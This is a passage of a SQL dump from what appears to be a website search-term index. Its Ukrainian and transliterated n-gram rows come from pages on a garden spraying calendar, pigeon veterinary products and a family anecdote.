sekret','znav sekret',0,1,1.3667,'Z51263',1,'*'),(1527377,'znav sekret dovgolittya','znav sekret dovgolittya',0,1,1.7667,'Z512631243',1,'*'),(1527378,'ілля','ілля',0,0,0.2667,'і000',1,'*'),(1527379,'ілля дмитрович','ілля дмитрович',0,1,1.4667,'і000',1,'*'),(1527380,'ілля дмитрович мій','ілля дмитрович мій',0,1,1.6,'і000',1,'*'),(1527381,'байки','байки',0,0,0.3333,'б000',1,'*'),(1527382,'дідусь','дідусь',0,0,0.4,'д000',1,'*'),(1527383,'дідусь знав','дідусь знав',0,1,1.3667,'д000',1,'*'),(1527384,'дідусь знав секрет','дідусь знав секрет',0,1,1.6,'д000',1,'*'),(1527385,'дмитрович','дмитрович',0,0,0.6,'д000',1,'*'),(1527386,'дмитрович мій','дмитрович мій',0,1,1.4333,'д000',1,'*'),(1527387,'дмитрович мій дідусь','дмитрович мій дідусь',0,1,1.6667,'д000',1,'*'),(1527388,'довголіття','довголіття',0,0,0.6667,'д000',1,'*'),(1527389,'довголіття та','довголіття та',0,1,1.4333,'д000',1,'*'),(1527390,'довголіття та любив','довголіття та любив',0,1,1.6333,'д000',1,'*'),(1527391,'знав','знав',0,0,0.2667,'з000',1,'*'),(1527392,'знав секрет','знав секрет',0,1,1.3667,'з000',1,'*'),(1527393,'знав секрет довголіття','знав секрет довголіття',0,1,1.7333,'з000',1,'*'),(1527394,'любив','любив',0,0,0.3333,'л000',1,'*'),(1527395,'любив розповідати','любив розповідати',0,1,1.5667,'л000',1,'*'),(1527396,'любив розповідати народні','любив розповідати народні',0,1,1.8333,'л000',1,'*'),(1527397,'мій','мій',0,0,0.2,'м000',1,'*'),(1527398,'мій дідусь','мій дідусь',0,1,1.3333,'м000',1,'*'),(1527399,'мій дідусь знав','мій дідусь знав',0,1,1.5,'м000',1,'*'),(1527400,'народні','народні',0,0,0.4667,'н000',1,'*'),(1527401,'народні байки','народні байки',0,1,1.4333,'н000',1,'*'),(1527402,'процик','процик',0,0,0.4,'п000',1,'*'),(1527403,'процик ілля','процик ілля',0,1,1.3667,'п000',1,'*'),(1527404,'процик ілля дмитрович','процик ілля дмитрович',0,1,1.7,'п000',1,'*'),(1527405,'розповідати','розповідати',0,0,0.7333,'р000',1,'*'),(1527406,'розповідати народні','розповідати народні',0,1,1.6333,'р000',1,'*'),(1527407,'розповідати народні байки','розповідати народні байки',0,1,1.8333,'р000',1,'*'),(1527408,'секрет','секрет',0,0,0.4,'с000',1,'*'),(1527409,'секрет довголіття','секрет довголіття',0,1,1.5667,'с000',1,'*'),(1527410,'секрет довголіття та','секрет довголіття та',0,1,1.6667,'с000',1,'*'),(1527411,'та любив','та любив',0,1,1.2667,'т000',1,'*'),(1527412,'та любив розповідати','та любив розповідати',0,1,1.6667,'т000',1,'*'),(1527469,'050','050',0,0,0.3,'',1,'*'),(1527470,'050 ес','050 ес',0,1,1.2,'е000',1,'*'),(1527471,'050 ес скор','050 ес скор',0,1,1.3667,'е000',1,'*'),(1527472,'10','10',0,0,0.2,'',11,'*'),(1527473,'10 літрів','10 літрів',0,1,1.3,'л000',1,'*'),(1527474,'10 літрів води','10 літрів води',0,1,1.4667,'л000',1,'*'),(1527475,'2 мл','2 мл',0,1,1.1333,'м000',1,'*'),(1527476,'2 мл 3','2 мл 3',0,1,1.2,'м000',1,'*'),(1527477,'2454','2454',0,0,0.4,'',1,'*'),(1527478,'250','250',0,0,0.3,'',3,'*'),(1527479,'250 ес','250 ес',0,1,1.2,'е000',1,'*'),(1527480,'250 ес хорус','250 ес хорус',0,1,1.4,'е000',1,'*'),(1527481,'3','3',0,0,0.1,'',14,'*'),(1527482,'3 гр','3 гр',0,1,1.1333,'г000',1,'*'),(1527483,'3 гр 50','3 гр 50',0,1,1.2333,'г000',1,'*'),(1527484,'50','50',0,0,0.2,'',7,'*'),(1527485,'50 гр','50 гр',0,1,1.1667,'г000',1,'*'),(1527486,'75','75',0,0,0.2,'',2,'*'),(1527487,'75 wg','75 wg',0,1,1.1667,'W200',1,'*'),(1527488,'75 wg тиовид','75 wg тиовид',0,1,1.4,'W200',1,'*'),(1527489,'8 мл','8 мл',0,1,1.1333,'м000',1,'*'),(1527490,'8 мл 2','8 мл 2',0,1,1.2,'м000',1,'*'),(1527491,'80wg','80wg',0,0,0.2667,'W200',1,'*'),(1527492,'80wg 8','80wg 8',0,1,1.2,'W200',1,'*'),(1527493,'80wg 8 мл','80wg 8 мл',0,1,1.3,'W200',1,'*'),(1527494,'doglyadu','doglyadu',0,0,0.5333,'D243',1,'*'),(1527495,'doglyadu za','doglyadu za',0,1,1.3667,'D2432',1,'*'),(1527496,'doglyadu za sadom','doglyadu za sadom',0,1,1.5667,'D243235',1,'*'),(1527497,'kalendarnij','kalendarnij',0,0,0.7333,'K453652',1,'*'),(1527498,'kalendarnij plan','kalendarnij plan',0,1,1.5333,'K453652145',1,'*'),(1527499,'kalendarnij plan doglyadu','kalendarnij plan doglyadu',0,1,1.8333,'K4536521453243',1,'*'),(1527500,'plan','plan',0,0,0.2667,'P450',1,'*'),(1527501,'plan doglyadu','plan doglyadu',0,1,1.4333,'P453243',1,'*'),(1527502,'plan doglyadu za','plan doglyadu za',0,1,1.5333,'P4532432',1,'*'),(1527503,'sadom','sadom',0,0,0.3333,'S350',1,'*'),(1527504,'wg','wg',0,0,0.1333,'W200',1,'*'),(1527505,'wg тиовид','wg тиовид',0,1,1.3,'W200',1,'*'),(1527506,'wg тиовид джет','wg тиовид джет',0,1,1.4667,'W200',1,'*'),(1527507,'za sadom','za sadom',0,1,1.2667,'Z350',1,'*'),(1527508,'більше','більше',0,0,0.4,'б000',3,'*'),(1527509,'більше п\'яти','більше п',0,1,1.4,'б000',1,'*'),(1527510,'більше п\'яти років','більше п років',0,1,1.6,'б000',1,'*'),(1527511,'бачок','бачок',0,0,0.3333,'б000',1,'*'),(1527512,'бачок для','бачок для',0,1,1.3,'б000',1,'*'),(1527513,'бачок для оприскування','бачок для оприскування',0,1,1.7333,'б000',1,'*'),(1527514,'в переліку','в переліку',0,1,1.3333,'в000',1,'*'),(1527515,'в переліку кількість','в переліку кількість',0,1,1.6667,'в000',1,'*'),(1527516,'в торгівельній','в торгівельній',0,1,1.4667,'в000',1,'*'),(1527517,'в торгівельній мережі','в торгівельній мережі',0,1,1.7,'в000',1,'*'),(1527518,'відповідно','відповідно',0,0,0.6667,'в000',2,'*'),(1527519,'відповідно до','відповідно до',0,1,1.4333,'в000',2,'*'),(1527520,'відповідно до черговості','відповідно до черговості',0,1,1.8,'в000',1,'*'),(1527521,'велика','велика',0,0,0.4,'в000',1,'*'),(1527522,'велика перевага','велика перевага',0,1,1.5,'в000',1,'*'),(1527523,'велика перевага даного','велика перевага даного',0,1,1.7333,'в000',1,'*'),(1527524,'внесення','внесення',0,0,0.5333,'в000',1,'*'),(1527525,'внесення препаратів','внесення препаратів',0,1,1.6333,'в000',1,'*'),(1527526,'внесення препаратів подано','внесення препаратів подано',0,1,1.8667,'в000',1,'*'),(1527527,'води','води',0,0,0.2667,'в000',6,'*'),(1527528,'води типовий','води типовий',0,1,1.4,'в000',1,'*'),(1527529,'води типовий бачок','води типовий бачок',0,1,1.6,'в000',1,'*'),(1527530,'гр','гр',0,0,0.1333,'г000',1,'*'),(1527531,'гр 50','гр 50',0,1,1.1667,'г000',1,'*'),(1527532,'гр 50 гр','гр 50 гр',0,1,1.2667,'г000',1,'*'),(1527533,'даного','даного',0,0,0.4,'д000',1,'*'),(1527534,'даного календарного','даного календарного',0,1,1.6333,'д000',1,'*'),(1527535,'даного календарного плану','даного календарного плану',0,1,1.8333,'д000',1,'*'),(1527536,'джет','джет',0,0,0.2667,'д000',1,'*'),(1527537,'джет 80wg','джет 80wg',0,1,1.3,'д200',1,'*'),(1527538,'джет 80wg 8','джет 80wg 8',0,1,1.3667,'д200',1,'*'),(1527539,'для','для',0,0,0.2,'д000',18,'*'),(1527540,'для змішування','для змішування',0,1,1.4667,'д000',1,'*'),(1527541,'для змішування препарати','для змішування препарати',0,1,1.8,'д000',1,'*'),(1527542,'для оприскування','для оприскування',0,1,1.5333,'д000',1,'*'),(1527543,'для оприскування препарати','для оприскування препарати',0,1,1.8667,'д000',1,'*'),(1527544,'до','до',0,0,0.1333,'д000',23,'*'),(1527545,'до черговості','до черговості',0,1,1.4333,'д000',1,'*'),(1527546,'до черговості в','до черговості в',0,1,1.5,'д000',1,'*'),(1527547,'догляду','догляду',0,0,0.4667,'д000',1,'*'),(1527548,'догляду за','догляду за',0,1,1.3333,'д000',1,'*'),(1527549,'догляду за садом','догляду за садом',0,1,1.5333,'д000',1,'*'),(1527550,'доступні','доступні',0,0,0.5333,'д000',1,'*'),(1527551,'доступні в','доступні в',0,1,1.3333,'д000',1,'*'),(1527552,'доступні в торгівельній','доступні в торгівельній',0,1,1.7667,'д000',1,'*'),(1527553,'ес','ес',0,0,0.1333,'е000',1,'*'),(1527554,'ес скор','ес скор',0,1,1.2333,'е000',1,'*'),(1527555,'ес скор 250','ес скор 250',0,1,1.3667,'е000',1,'*'),(1527556,'ес хорус','ес хорус',0,1,1.2667,'е000',1,'*'),(1527557,'ес хорус 75','ес хорус 75',0,1,1.3667,'е000',1,'*'),(1527558,'за садом','за садом',0,1,1.2667,'з000',1,'*'),(1527559,'змішування','змішування',0,0,0.6667,'з000',1,'*'),(1527560,'змішування препарати','змішування препарати',0,1,1.6667,'з000',1,'*'),(1527561,'змішування препарати поширені','змішування препарати поширені',0,1,1.9667,'з000',1,'*'),(1527562,'кількість','кількість',0,0,0.6,'к000',7,'*'),(1527563,'кількість наприклад','кількість наприклад',0,1,1.6333,'к000',1,'*'),(1527564,'календарний','календарний',0,0,0.7333,'к000',3,'*'),(1527565,'календарний план','календарний план',0,1,1.5333,'к000',1,'*'),(1527566,'календарний план догляду','календарний план догляду',0,1,1.8,'к000',1,'*'),(1527567,'календарного','календарного',0,0,0.8,'к000',3,'*'),(1527568,'календарного плану','календарного плану',0,1,1.6,'к000',1,'*'),(1527569,'календарного плану препарати','календарного плану препарати',0,1,1.9333,'к000',1,'*'),(1527570,'користуюсь','користуюсь',0,0,0.6667,'к000',1,'*'),(1527571,'користуюсь більше','користуюсь більше',0,1,1.5667,'к000',1,'*'),(1527572,'користуюсь більше п\'яти','користуюсь більше п',0,1,1.7667,'к000',1,'*'),(1527573,'літрів','літрів',0,0,0.4,'л000',1,'*'),(1527574,'літрів води','літрів води',0,1,1.3667,'л000',1,'*'),(1527575,'літрів води типовий','літрів води типовий',0,1,1.6333,'л000',1,'*'),(1527576,'матч','матч',0,0,0.2667,'м000',2,'*'),(1527577,'матч 050','матч 050',0,1,1.2667,'м000',1,'*'),(1527578,'матч 050 ес','матч 050 ес',0,1,1.3667,'м000',1,'*'),(1527579,'мережі','мережі',0,0,0.4,'м000',1,'*'),(1527580,'мережі норми','мережі норми',0,1,1.4,'м000',1,'*'),(1527581,'мережі норми внесення','мережі норми внесення',0,1,1.7,'м000',1,'*'),(1527582,'мл','мл',0,0,0.1333,'м000',3,'*'),(1527583,'мл 2','мл 2',0,1,1.1333,'м000',1,'*'),(1527584,'мл 2 мл','мл 2 мл',0,1,1.2333,'м000',1,'*'),(1527585,'мл 3','мл 3',0,1,1.1333,'м000',1,'*'),(1527586,'мл 3 гр','мл 3 гр',0,1,1.2333,'м000',1,'*'),(1527587,'на 10','на 10',0,1,1.1667,'н000',3,'*'),(1527588,'на 10 літрів','на 10 літрів',0,1,1.4,'н000',1,'*'),(1527589,'назва','назва',0,0,0.3333,'н000',3,'*'),(1527590,'назва препарату','назва препарату',0,1,1.5,'н000',1,'*'),(1527591,'назва препарату та','назва препарату та',0,1,1.6,'н000',1,'*'),(1527592,'наприклад','наприклад',0,0,0.6,'н000',2,'*'),(1527593,'норми','норми',0,0,0.3333,'н000',1,'*'),(1527594,'норми внесення','норми внесення',0,1,1.4667,'н000',1,'*'),(1527595,'норми внесення препаратів','норми внесення препаратів',0,1,1.8333,'н000',1,'*'),(1527596,'оприскування','оприскування',0,0,0.8,'о000',1,'*'),(1527597,'оприскування препарати','оприскування препарати',0,1,1.7333,'о000',1,'*'),(1527598,'оприскування препарати сумісні','оприскування препарати сумісні',0,1,2,'о000',1,'*'),(1527599,'п\'яти','п',0,0,0.3333,'п000',1,'*'),(1527600,'п\'яти років','п років',0,1,1.3667,'п000',1,'*'),(1527601,'п\'яти років велика','п років велика',0,1,1.6,'п000',1,'*'),(1527602,'перевага','перевага',0,0,0.5333,'п000',2,'*'),(1527603,'перевага даного','перевага даного',0,1,1.5,'п000',1,'*'),(1527604,'перевага даного календарного','перевага даного календарного',0,1,1.9333,'п000',1,'*'),(1527605,'переліку','переліку',0,0,0.5333,'п000',1,'*'),(1527606,'переліку кількість','переліку кількість',0,1,1.6,'п000',1,'*'),(1527607,'переліку кількість наприклад','переліку кількість наприклад',0,1,1.9333,'п000',1,'*'),(1527608,'план','план',0,0,0.2667,'п000',1,'*'),(1527609,'план догляду','план догляду',0,1,1.4,'п000',1,'*'),(1527610,'план догляду за','план догляду за',0,1,1.5,'п000',1,'*'),(1527611,'плану','плану',0,0,0.3333,'п000',2,'*'),(1527612,'плану препарати','плану препарати',0,1,1.5,'п000',1,'*'),(1527613,'плану препарати розраховано','плану препарати розраховано',0,1,1.9,'п000',1,'*'),(1527614,'подано','подано',0,0,0.4,'п000',1,'*'),(1527615,'подано назва','подано назва',0,1,1.4,'п000',1,'*'),(1527616,'подано назва препарату','подано назва препарату',0,1,1.7333,'п000',1,'*'),(1527617,'поширені','поширені',0,0,0.5333,'п000',1,'*'),(1527618,'поширені та','поширені та',0,1,1.3667,'п000',1,'*'),(1527619,'поширені та доступні','поширені та доступні',0,1,1.6667,'п000',1,'*'),(1527620,'препаратів','препаратів',0,0,0.6667,'п000',1,'*'),(1527621,'препаратів подано','препаратів подано',0,1,1.5667,'п000',1,'*'),(1527622,'препаратів подано назва','препаратів подано назва',0,1,1.7667,'п000',1,'*'),(1527623,'препарати','препарати',0,0,0.6,'п000',2,'*'),(1527624,'препарати поширені','препарати поширені',0,1,1.6,'п000',1,'*'),(1527625,'препарати поширені та','препарати поширені та',0,1,1.7,'п000',1,'*'),(1527626,'препарати розраховано','препарати розраховано',0,1,1.7,'п000',1,'*'),(1527627,'препарати розраховано на','препарати розраховано на',0,1,1.8,'п000',1,'*'),(1527628,'препарати сумісні','препарати сумісні',0,1,1.5667,'п000',1,'*'),(1527629,'препарати сумісні для','препарати сумісні для',0,1,1.7,'п000',1,'*'),(1527630,'препарату','препарату',0,0,0.6,'п000',5,'*'),(1527631,'препарату та','препарату та',0,1,1.4,'п000',1,'*'),(1527632,'препарату та відповідно','препарату та відповідно',0,1,1.7667,'п000',1,'*'),(1527633,'розраховано','розраховано',0,0,0.7333,'р000',1,'*'),(1527634,'розраховано на','розраховано на',0,1,1.4667,'р000',1,'*'),(1527635,'розраховано на 10','розраховано на 10',0,1,1.5667,'р000',1,'*'),(1527636,'років','років',0,0,0.3333,'р000',6,'*'),(1527637,'років велика','років велика',0,1,1.4,'р000',1,'*'),(1527638,'років велика перевага','років велика перевага',0,1,1.7,'р000',1,'*'),(1527639,'садом','садом',0,0,0.3333,'с000',1,'*'),(1527640,'скор','скор',0,0,0.2667,'с000',1,'*'),(1527641,'скор 250','скор 250',0,1,1.2667,'с000',1,'*'),(1527642,'скор 250 ес','скор 250 ес',0,1,1.3667,'с000',1,'*'),(1527643,'сумісні','сумісні',0,0,0.4667,'с000',1,'*'),(1527644,'сумісні для','сумісні для',0,1,1.3667,'с000',1,'*'),(1527645,'сумісні для змішування','сумісні для змішування',0,1,1.7333,'с000',1,'*'),(1527646,'та відповідно','та відповідно',0,1,1.4333,'т000',1,'*'),(1527647,'та відповідно до','та відповідно до',0,1,1.5333,'т000',1,'*'),(1527648,'та доступні','та доступні',0,1,1.3667,'т000',1,'*'),(1527649,'та доступні в','та доступні в',0,1,1.4333,'т000',1,'*'),(1527650,'тиовид','тиовид',0,0,0.4,'т000',1,'*'),(1527651,'тиовид джет','тиовид джет',0,1,1.3667,'т000',1,'*'),(1527652,'тиовид джет 80wg','тиовид джет 80wg',0,1,1.5333,'т200',1,'*'),(1527653,'типовий','типовий',0,0,0.4667,'т000',1,'*'),(1527654,'типовий бачок','типовий бачок',0,1,1.4333,'т000',1,'*'),(1527655,'типовий бачок для','типовий бачок для',0,1,1.5667,'т000',1,'*'),(1527656,'торгівельній','торгівельній',0,0,0.8,'т000',1,'*'),(1527657,'торгівельній мережі','торгівельній мережі',0,1,1.6333,'т000',1,'*'),(1527658,'торгівельній мережі норми','торгівельній мережі норми',0,1,1.8333,'т000',1,'*'),(1527659,'хорус','хорус',0,0,0.3333,'х000',1,'*'),(1527660,'хорус 75','хорус 75',0,1,1.2667,'х000',1,'*'),(1527661,'хорус 75 wg','хорус 75 wg',0,1,1.3667,'х200',1,'*'),(1527662,'черговості','черговості',0,0,0.6667,'ч000',1,'*'),(1527663,'черговості в','черговості в',0,1,1.4,'ч000',1,'*'),(1527664,'черговості в переліку','черговості в переліку',0,1,1.7,'ч000',1,'*'),(1527724,'135','135',0,0,0.3,'',1,'*'),(1527725,'holubivnykam','holubivnykam',0,0,0.8,'H41525',1,'*'),(1527726,'informatsiia','informatsiia',0,0,0.8,'I516532',1,'*'),(1527727,'informatsiia holubivnykam','informatsiia holubivnykam',0,1,1.8333,'I51653241525',1,'*'),(1527728,'інформація голубівникам','інформація голубівникам',0,1,1.7667,'і000',1,'*'),(1527729,'голубівникам','голубівникам',0,0,0.8,'г000',1,'*'),(1528766,'1','1',0,0,0.1,'',19,'*'),(1528772,'100','100',0,0,0.3,'',9,'*'),(1528791,'20','20',0,0,0.2,'',9,'*'),(1528794,'200','200',0,0,0.3,'',3,'*'),(1528817,'33000','33000',0,0,0.5,'',5,'*'),(1528818,'33000 україна','33000 україна',0,1,1.4333,'у000',5,'*'),(1528819,'33000 україна м','33000 україна м',0,1,1.5,'у000',5,'*'),(1528830,'50 мг','50 мг',0,1,1.1667,'м000',3,'*'),(1528844,'89','89',0,0,0.2,'',6,'*'),(1528863,'і','і',0,0,0.0667,'і000',21,'*'),(1528874,'а','а',0,0,0.0667,'а000',12,'*'),(1528913,'від','від',0,0,0.2,'в000',17,'*'),(1528947,'ветеринарній','ветеринарній',0,0,0.8,'в000',4,'*'),(1528948,'ветеринарній медицині','ветеринарній медицині',0,1,1.7,'в000',4,'*'),(1528949,'ветеринарній медицині виробник','ветеринарній медицині виробник',0,1,2,'в000',3,'*'),(1528953,'випуску','випуску',0,0,0.4667,'в000',7,'*'),(1528958,'виробник','виробник',0,0,0.5333,'в000',6,'*'),(1528964,'властивостi','властивостi',0,0,0.7333,'в000',3,'*'),(1528970,'вул','вул',0,0,0.2,'в000',6,'*'),(1528971,'вул дворецька','вул дворецька',0,1,1.4333,'в000',6,'*'),(1528972,'вул дворецька 89','вул дворецька 89',0,1,1.5333,'в000',6,'*'),(1528973,'г','г',0,0,0.0667,'г000',8,'*'),(1528981,'голубів','голубів',0,0,0.4667,'г000',10,'*'),(1528992,'дворецька','дворецька',0,0,0.6,'д000',6,'*'),(1528993,'дворецька 89','дворецька 89',0,1,1.4,'д000',6,'*'),(1528998,'для застосування','для застосування',0,1,1.5333,'д000',4,'*'),(1528999,'для застосування у','для застосування у',0,1,1.6,'д000',4,'*'),(1529009,'дозування','дозування',0,0,0.6,'д000',7,'*'),(1529024,'з','з',0,0,0.0667,'з000',24,'*'),(1529051,'застосовувати','застосовувати',0,0,0.8667,'з000',5,'*'),(1529054,'застосування','застосування',0,0,0.8,'з000',7,'*'),(1529057,'застосування у','застосування у',0,1,1.4667,'з000',4,'*'),(1529058,'застосування у ветеринарній','застосування у ветеринарній',0,1,1.9,'з000',4,'*'),(1529132,'м','м',0,0,0.0667,'м000',12,'*'),(1529133,'м рівне','м рівне',0,1,1.2333,'м000',6,'*'),(1529134,'м рівне вул','м рівне вул',0,1,1.3667,'м000',5,'*'),(1529141,'містить','містить',0,0,0.4667,'м000',8,'*'),(1529158,'мг','мг',0,0,0.1333,'м000',6,'*'),(1529192,'медицині','медицині',0,0,0.5333,'м000',4,'*'),(1529193,'медицині виробник','медицині виробник',0,1,1.5667,'м000',3,'*'),(1529201,'на 1','на 1',0,1,1.1333,'н000',4,'*'),(1529209,'не','не',0,0,0.1333,'н000',18,'*'),(1529235,'опис','опис',0,0,0.2667,'о000',4,'*'),(1529255,'пакети','пакети',0,0,0.4,'п000',5,'*'),(1529298,'порошок','порошок',0,0,0.4667,'п000',6,'*'),(1529304,'пп','пп',0,0,0.1333,'п000',6,'*'),(1529305,'пп фірма','пп фірма',0,1,1.2667,'п000',6,'*'),(1529306,'пп фірма “фарматон”,','пп фірма “фарматон”,',0,1,1.6667,'п000',5,'*'),(1529325,'придатності','придатності',0,0,0.7333,'п000',6,'*'),(1529328,'продукту','продукту',0,0,0.5333,'п000',3,'*'),(1529329,'продукту пп','продукту пп',0,1,1.3667,'п000',3,'*'),(1529330,'продукту пп фірма','продукту пп фірма',0,1,1.5667,'п000',3,'*'),(1529331,'протипоказання','протипоказання',0,0,0.9333,'п000',5,'*'),(1529332,'протипоказання не','протипоказання не',0,1,1.5667,'п000',4,'*'),(1529334,'протягом','протягом',0,0,0.5333,'п000',8,'*'),(1529339,'птахів','птахів',0,0,0.4,'п000',4,'*'),(1529342,'рівне','рівне',0,0,0.3333,'р000',6,'*'),(1529343,'рівне вул','рівне вул',0,1,1.3,'р000',5,'*'),(1529344,'рівне вул дворецька','рівне вул дворецька',0,1,1.6333,'р000',5,'*'),(1529369,'с','с',0,0,0.0667,'с000',12,'*'),(1529385,'склад','склад',0,0,0.3333,'с000',7,'*'),(1529386,'склад 1','склад 1',0,1,1.2333,'с000',4,'*'),(1529431,'термін','термін',0,0,0.4,'т000',6,'*'),(1529432,'термін придатності','термін придатності',0,1,1.6,'т000',6,'*'),(1529439,'у ветеринарній','у ветеринарній',0,1,1.4667,'у000',4,'*'),(1529440,'у ветеринарній медицині','у ветеринарній медицині',0,1,1.7667,'у000',4,'*'),(1529443,'україна','україна',0,0,0.4667,'у000',8,'*'),(1529444,'україна м','україна м',0,1,1.3,'у000',5,'*'),(1529445,'україна м рівне','україна м рівне',0,1,1.5,'у000',5,'*'),(1529452,'фірма','фірма',0,0,0.3333,'ф000',6,'*'),(1529453,'фірма “фарматон”,','фірма “фарматон”,',0,1,1.5667,'ф000',5,'*'),(1529454,'фірма “фарматон”, 33000','фірма “фарматон”, 33000',0,1,1.7667,'ф000',5,'*'),(1529461,'форма','форма',0,0,0.3333,'ф000',8,'*'),(1529462,'форма випуску','форма випуску',0,1,1.4333,'ф000',7,'*'),(1529477,'“фарматон”,','“фарматон”,',0,0,0.7333,'“000',5,'*'),(1529478,'“фарматон”, 33000','“фарматон”, 33000',0,1,1.5667,'“000',5,'*'),(1529479,'“фарматон”, 33000 україна','“фарматон”, 33000 україна',0,1,1.8333,'“000',5,'*'),(1535915,'1 г','1 г',0,1,1.1,'г000',3,'*'),(1535916,'1 г містить','1 г містить',0,1,1.3667,'г000',1,'*'),(1535917,'1 л','1 л',0,1,1.1,'л000',3,'*'),(1535918,'1 л води','1 л води',0,1,1.2667,'л000',2,'*'),(1535919,'1-2','1-2',0,0,0.3,'',2,'*'),(1535920,'1-2 г','1-2 г',0,1,1.1667,'г000',1,'*'),(1535921,'1-2 г препарату','1-2 г препарату',0,1,1.5,'г000',1,'*'),(1535922,'10 100','10 100',0,1,1.2,'',1,'*'),(1535923,'10 100 200','10 100 200',0,1,1.3333,'',1,'*'),(1535924,'100 200','100 200',0,1,1.2333,'',1,'*'),(1535925,'100 200 г','100 200 г',0,1,1.3,'г000',1,'*'),(1535926,'2 роки','2 роки',0,1,1.2,'р000',3,'*'),(1535927,'2 роки для','2 роки для',0,1,1.3333,'р000',1,'*'),(1535928,'20 мг','20 мг',0,1,1.1667,'м000',1,'*'),(1535929,'20 мг тіамулін','20 мг тіамулін',0,1,1.4667,'м000',1,'*'),(1535930,'200 г','200 г',0,1,1.1667,'г000',2,'*'),(1535931,'200 г зберігання','200 г зберігання',0,1,1.5333,'г000',2,'*'),(1535932,'2458','2458',0,0,0.4,'',1,'*'),(1535933,'25 с','25 с',0,1,1.1333,'с000',7,'*'),(1535934,'25 с термін','25 с термін',0,1,1.3667,'с000',5,'*'),(1535935,'5','5',0,0,0.1,'',14,'*'),(1535936,'5 до','5 до',0,1,1.1333,'д000',4,'*'),(1535937,'5 до 25','5 до 25',0,1,1.2333,'д000',4,'*'),(1535938,'5-6','5-6',0,0,0.3,'',1,'*'),(1535939,'5-6 діб','5-6 діб',0,1,1.2333,'д000',1,'*'),(1535940,'50 мг окситетрациклін','50 мг окситетрациклін',0,1,1.7,'м000',1,'*'),(1535941,'60','60',0,0,0.2,'',1,'*'),(1535942,'60 мг','60 мг',0,1,1.1667,'м000',1,'*'),(1535943,'60 мг допоміжна','60 мг допоміжна',0,1,1.5,'м000',1,'*'),(1535944,'actinobacillus','actinobacillus',0,0,0.9333,'A2351242',1,'*'),(1535945,'actinobacillus spp','actinobacillus spp',0,1,1.6,'A23512421',1,'*'),(1535946,'actinobacillus spp e','actinobacillus spp e',0,1,1.6667,'A23512421',1,'*'),(1535947,'chlamidia','chlamidia',0,0,0.6,'C453',1,'*'),(1535948,'chlamidia spp','chlamidia spp',0,1,1.4333,'C45321',1,'*'),(1535949,'chlamidia spp мікоплазм','chlamidia spp мікоплазм',0,1,1.7667,'C45321',1,'*'),(1535950,'chlamydia','chlamydia',0,0,0.6,'C453',1,'*'),(1535951,'chlamydia spp','chlamydia spp',0,1,1.4333,'C45321',1,'*'),(1535952,'chlamydia spp pasteurella','chlamydia spp pasteurella',0,1,1.8333,'C453212364',1,'*'),(1535953,'columbae','columbae',0,0,0.5333,'C451',1,'*'),(1535954,'columbae t','columbae t',0,1,1.3333,'C4513',1,'*'),(1535955,'columbae t gallinae','columbae t gallinae',0,1,1.6333,'C4513245',1,'*'),(1535956,'e','e',0,0,0.0667,'E000',1,'*'),(1535957,'e сoli','e сoli',0,1,1.2,'E400',1,'*'),(1535958,'e сoli klebsiella','e сoli klebsiella',0,1,1.5667,'E424124',1,'*'),(1535959,'eimeria','eimeria',0,0,0.4667,'E560',1,'*'),(1535960,'eimeria spp','eimeria spp',0,1,1.3667,'E5621',1,'*'),(1535961,'eimeria spp histomonas','eimeria spp histomonas',0,1,1.7333,'E56212352',1,'*'),(1535962,'gallinae','gallinae',0,0,0.5333,'G450',2,'*'),(1535963,'gallinae лямблій','gallinae лямблій',0,1,1.5333,'G450',1,'*'),(1535964,'gallinae лямблій lamblia','gallinae лямблій lamblia',0,1,1.8,'G454514',1,'*'),(1535965,'histomonas','histomonas',0,0,0.6667,'H2352',1,'*'),(1535966,'histomonas meleagridis','histomonas meleagridis',0,1,1.7333,'H2352542632',1,'*'),(1535967,'histomonas meleagridis trichomonas','histomonas meleagridis trichomonas',0,1,2,'H235254263236252',1,'*'),(1535968,'intestinalis','intestinalis',0,0,0.8,'I5323542',2,'*'),(1535969,'intestinalis та','intestinalis та',0,1,1.5,'I5323542',1,'*'),(1535970,'intestinalis та амеби','intestinalis та амеби',0,1,1.7,'I5323542',1,'*'),(1535971,'klebsiella','klebsiella',0,0,0.6667,'K4124',2,'*'),(1535972,'klebsiella spp','klebsiella spp',0,1,1.4667,'K412421',2,'*'),(1535973,'klebsiella spp pasteurella','klebsiella spp pasteurella',0,1,1.8667,'K4124212364',1,'*'),(1535974,'kompleksnij','kompleksnij',0,0,0.7333,'K514252',1,'*'),(1535975,'kompleksnij preparat','kompleksnij preparat',0,1,1.6667,'K51425216163',1,'*'),(1535976,'lamblia','lamblia',0,0,0.4667,'L514',1,'*'),(1535977,'lamblia intestinalis','lamblia intestinalis',0,1,1.6667,'L5145323542',1,'*'),(1535978,'lamblia intestinalis та','lamblia intestinalis та',0,1,1.7667,'L5145323542',1,'*'),(1535979,'meleagridis','meleagridis',0,0,0.7333,'M42632',1,'*'),(1535980,'meleagridis trichomonas','meleagridis trichomonas',0,1,1.7667,'M4263236252',1,'*'),(1535981,'meleagridis trichomonas columbae','meleagridis trichomonas columbae',0,1,2,'M4263236252451',1,'*'),(1535982,'multocida','multocida',0,0,0.6,'M4323',1,'*'),(1535983,'multocida staphylococcus','multocida staphylococcus',0,1,1.8,'M432323142',1,'*'),(1535984,'multocida staphylococcus spp','multocida staphylococcus spp',0,1,1.9333,'M4323231421',1,'*'),(1535985,'mycoplasma','mycoplasma',0,0,0.6667,'M21425',2,'*'),(1535986,'mycoplasma spp','mycoplasma spp',0,1,1.4667,'M2142521',1,'*'),(1535987,'mycoplasma spp деяких','mycoplasma spp деяких',0,1,1.7,'M2142521',1,'*'),(1535988,'mycoplasma spp спірохет','mycoplasma spp спірохет',0,1,1.7667,'M2142521',1,'*'),(1535989,'pasteurella','pasteurella',0,0,0.7333,'P2364',1,'*'),(1535990,'pasteurella multocida','pasteurella multocida',0,1,1.7,'P236454323',1,'*'),(1535991,'pasteurella multocida staphylococcus','pasteurella multocida staphylococcus',0,1,2,'P23645432323142',1,'*'),(1535992,'pasteurella spp','pasteurella spp',0,1,1.5,'P236421',1,'*'),(1535993,'pasteurella spp salmonella','pasteurella spp salmonella',0,1,1.8667,'P2364212454',1,'*'),(1535994,'preparat','preparat',0,0,0.5333,'P6163',4,'*'),(1535995,'rickettsia','rickettsia',0,0,0.6667,'R232',1,'*'),(1535996,'rickettsia spp','rickettsia spp',0,1,1.4667,'R2321',1,'*'),(1535997,'rickettsia spp спектр','rickettsia spp спектр',0,1,1.7,'R2321',1,'*'),(1535998,'salmonella','salmonella',0,0,0.6667,'S454',2,'*'),(1535999,'salmonella 